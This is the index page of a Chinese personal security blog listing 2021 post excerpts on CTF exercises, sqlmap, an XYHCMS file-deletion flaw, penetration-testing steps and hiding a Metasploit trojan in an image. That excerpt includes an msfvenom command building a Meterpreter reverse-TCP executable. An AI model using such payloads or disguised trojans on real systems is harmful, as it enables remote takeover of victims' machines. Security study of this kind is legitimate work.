YY’s Blog

Posted by YY——阳阳 on August 13, 2021

2021-08-09-ctfshow做题笔记

作者：鸿鹄（阳阳） crypto crypto签到-14 这些题目包含了常用的密码学 rot密码凯撒密码 jsfuck、表情密码（均可直接在控制台运行出来） OoK加密 brainfuck https://www.splitbrain.org/services/ook rsa算法 https://mp....

Posted by YY——阳阳 on August 9, 2021

sqlmap使用大全

Sqlmap工具一.介绍开源的SQL注入漏洞检测的工具，能够检测动态页面中的get/post参数，cookie，http头，还能够查看数据，文件系统访问，甚至能够操作系统命令执行。检测方式：布尔盲注、时间盲注、报错注入、UNION联合查询注入、堆叠注入支持数据库：Mysql、Oracle、PostgreSQL、MSSQL、M...

Posted by YY——阳阳 on August 3, 2021

XYHCMS漏洞

作者：掌控安全-柚子一.XYHCMS 3.2 后台任意文件删除漏洞介绍影响版本是XYHCMS 3.2，漏洞的成因是没有对删除的文件没有做任何限制，导致可以直接把安装文件删除。漏洞分析打开 /App/Manage/Controller/DatabaseController.class.php 文件。锁定 delSqlFiles()函数。漏洞复现 1.进入后...

Posted by YY——阳阳 on August 3, 2021

网络安全学习目录

声明：《网络安全学习目录》系列的所有文章仅用于技术交流和研究使用，切勿用作其他非法用途，希望大家遵守相关法律法规，坚决抵制任何违法犯罪活动。目录转载 https://songly.blog.csdn.net/article/details/106695042

Posted by YY——阳阳 on July 29, 2021

在图片中隐藏msf木马

首先下载一个，普通的图片，并将它转换为ico格式。 url地址：https://www.qtool.net/ico 转换后就是一个ico的图片格式。 Msfvenom生成木马 Msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=8888 -f exe >shell.exe 会在桌面生成一个一个exe文件。 ...

Posted by YY——阳阳 on July 29, 2021

黑客攻击步骤

Posted by YY——阳阳 on July 12, 2021

一套基本的渗透测试流程

信息收集：资产收集，主机信息收集资产收集以搜索引擎为例： Google Hacking 其他引擎的使用与搜索：bing，baidu shadon ZoomEye fofa Google Hacking intitle: intext:...

Posted by YY——阳阳 on July 12, 2021

WEB安全体系

Posted by YY——阳阳 on July 12, 2021

Docker

Docker学习

Docker docker学习 DOCKER概述; DOCKER安装 DOCKER命令镜像命令容器命令操作命令 ...

Posted by YY——阳阳 on July 12, 2021

YY

📕 152词 | 3352字

2021-08-13-ctfshowweb入门

2021-08-13-ctfshowweb入门

2021-08-09-ctfshow做题笔记

2021-08-09-ctfshow做题笔记

sqlmap使用大全

sqlmap使用大全

XYHCMS漏洞

XYHCMS漏洞

网络安全学习目录

网络安全学习目录

在图片中隐藏msf木马

在图片中隐藏msf木马

黑客攻击步骤

黑客攻击步骤

一套基本的渗透测试流程

一套基本的渗透测试流程

WEB安全体系

WEB安全体系

Docker

Docker学习

FEATURED TAGS

BE IN LOVE

ABOUT ME

MORE SITES